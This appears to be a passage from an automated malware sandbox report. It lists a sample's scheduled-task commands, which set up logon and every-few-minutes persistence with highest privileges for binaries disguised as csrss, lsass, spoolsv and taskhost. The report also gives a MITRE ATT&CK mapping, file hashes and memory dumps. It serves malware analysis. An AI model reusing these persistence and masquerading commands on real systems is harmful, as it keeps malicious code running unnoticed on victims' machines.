schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Recorded TV\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Public\Recorded TV\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Recorded TV\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\tracing\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\tracing\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Windows\tracing\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef46" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef46" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe

Filesize
4.9MB

MD5
471dfd63a2cfd2379f28e92f033b18b6

SHA1
38be89f26783f905afebab3e08ece66c96d8e312

SHA256
290bd0df9c0b71a4a258a57595bc4d31b6fb788645f1a11d46ea7f2bfb618687

SHA512
c55e11d5759922f6d94f285e889e2f7e7e5a5b1ab1544da92e4fe916e2470b8774438745afca1ace4b3fbdb7b797df740ac728a9849015c29f9fb86a46eba8bf

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe

Filesize
4.9MB

MD5
471dfd63a2cfd2379f28e92f033b18b6

SHA1
38be89f26783f905afebab3e08ece66c96d8e312

SHA256
290bd0df9c0b71a4a258a57595bc4d31b6fb788645f1a11d46ea7f2bfb618687

SHA512
c55e11d5759922f6d94f285e889e2f7e7e5a5b1ab1544da92e4fe916e2470b8774438745afca1ace4b3fbdb7b797df740ac728a9849015c29f9fb86a46eba8bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\nGqzZBedkm.bat

Filesize
296B

MD5
c1badb1b3497fe89ee7cdf8261a91ab2

SHA1
bde357cecdbd619254a591ae96c2ae40c7a07d5d

SHA256
779e9e043bc7010f74631bd1670a3af2809c14f333c17031434f02050b6ac995

SHA512
ab98103354e4221e7a72c2ebf1ce4c9d0709ef4414989bf2164617dab9b7f81923f8d7e230f1fe9f3dccee2f286dcabed67c7ec284ab68dd9182d714e58738c2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d301b677458302afef75c15767065a4c

SHA1
ae6eac5881d0dd41fe8efc4fc5266fcd14e35000

SHA256
547d27427be8ace2e477134939b21a99741c6ac1aae120837fd3120075a667e2

SHA512
3e233e35a9555150be93efd13b89a64d8fb217f2801405b413de69a1c256e3496ecbfe981ac2ecfb51f0888abc8a51a8cb876ecc3bf7034ea905b2e6c196cd4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d301b677458302afef75c15767065a4c

SHA1
ae6eac5881d0dd41fe8efc4fc5266fcd14e35000

SHA256
547d27427be8ace2e477134939b21a99741c6ac1aae120837fd3120075a667e2

SHA512
3e233e35a9555150be93efd13b89a64d8fb217f2801405b413de69a1c256e3496ecbfe981ac2ecfb51f0888abc8a51a8cb876ecc3bf7034ea905b2e6c196cd4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d301b677458302afef75c15767065a4c

SHA1
ae6eac5881d0dd41fe8efc4fc5266fcd14e35000

SHA256
547d27427be8ace2e477134939b21a99741c6ac1aae120837fd3120075a667e2

SHA512
3e233e35a9555150be93efd13b89a64d8fb217f2801405b413de69a1c256e3496ecbfe981ac2ecfb51f0888abc8a51a8cb876ecc3bf7034ea905b2e6c196cd4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d301b677458302afef75c15767065a4c

SHA1
ae6eac5881d0dd41fe8efc4fc5266fcd14e35000

SHA256
547d27427be8ace2e477134939b21a99741c6ac1aae120837fd3120075a667e2

SHA512
3e233e35a9555150be93efd13b89a64d8fb217f2801405b413de69a1c256e3496ecbfe981ac2ecfb51f0888abc8a51a8cb876ecc3bf7034ea905b2e6c196cd4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d301b677458302afef75c15767065a4c

SHA1
ae6eac5881d0dd41fe8efc4fc5266fcd14e35000

SHA256
547d27427be8ace2e477134939b21a99741c6ac1aae120837fd3120075a667e2

SHA512
3e233e35a9555150be93efd13b89a64d8fb217f2801405b413de69a1c256e3496ecbfe981ac2ecfb51f0888abc8a51a8cb876ecc3bf7034ea905b2e6c196cd4f

Download Submit
memory/1180-101-0x000007FEEAFB0000-0x000007FEEB9D3000-memory.dmp

Filesize
10.1MB

Download
memory/1180-120-0x0000000002524000-0x0000000002527000-memory.dmp

Filesize
12KB

Download
memory/1320-99-0x000007FEEAFB0000-0x000007FEEB9D3000-memory.dmp

Filesize
10.1MB

Download
memory/1320-117-0x0000000002694000-0x0000000002697000-memory.dmp

Filesize
12KB

Download
memory/1460-110-0x0000000000E00000-0x00000000012F4000-memory.dmp

Filesize
5.0MB

Download
memory/1504-67-0x0000000000550000-0x0000000000558000-memory.dmp

Filesize
32KB

Download
memory/1504-65-0x0000000000530000-0x000000000053E000-memory.dmp

Filesize
56KB

Download
memory/1504-55-0x000000001B980000-0x000000001BAAE000-memory.dmp

Filesize
1.2MB

Download
memory/1504-56-0x0000000000280000-0x000000000029C000-memory.dmp

Filesize
112KB

Download
memory/1504-57-0x00000000002A0000-0x00000000002A8000-memory.dmp

Filesize
32KB

Download
memory/1504-61-0x00000000004F0000-0x00000000004FA000-memory.dmp

Filesize
40KB

Download
memory/1504-62-0x0000000000500000-0x0000000000512000-memory.dmp

Filesize
72KB

Download
memory/1504-58-0x00000000002B0000-0x00000000002C0000-memory.dmp

Filesize
64KB

Download
memory/1504-63-0x0000000000510000-0x000000000051A000-memory.dmp

Filesize
40KB

Download
memory/1504-59-0x0000000000350000-0x0000000000366000-memory.dmp

Filesize
88KB

Download
memory/1504-68-0x0000000000560000-0x000000000056C000-memory.dmp

Filesize
48KB

Download
memory/1504-54-0x0000000000A20000-0x0000000000F14000-memory.dmp

Filesize
5.0MB

Download
memory/1504-66-0x0000000000540000-0x0000000000548000-memory.dmp

Filesize
32KB

Download
memory/1504-60-0x00000000002C0000-0x00000000002D0000-memory.dmp

Filesize
64KB

Download
memory/1504-64-0x0000000000520000-0x000000000052E000-memory.dmp

Filesize
56KB

Download
memory/1592-103-0x000007FEEAFB0000-0x000007FEEB9D3000-memory.dmp

Filesize
10.1MB

Download
memory/1592-116-0x0000000002404000-0x0000000002407000-memory.dmp

Filesize
12KB

Download
memory/1756-81-0x000007FEFC141000-0x000007FEFC143000-memory.dmp

Filesize
8KB

Download
memory/1784-102-0x000007FEEAFB0000-0x000007FEEB9D3000-memory.dmp

Filesize
10.1MB

Download
memory/1784-115-0x00000000028D4000-0x00000000028D7000-memory.dmp

Filesize
12KB

Download
memory/1936-119-0x00000000027B4000-0x00000000027B7000-memory.dmp

Filesize
12KB

Download
memory/1936-100-0x000007FEEAFB0000-0x000007FEEB9D3000-memory.dmp

Filesize
10.1MB

Download
memory/2012-104-0x000007FEEAFB0000-0x000007FEEB9D3000-memory.dmp

Filesize
10.1MB

Download
memory/2012-118-0x00000000023A4000-0x00000000023A7000-memory.dmp

Filesize
12KB

Download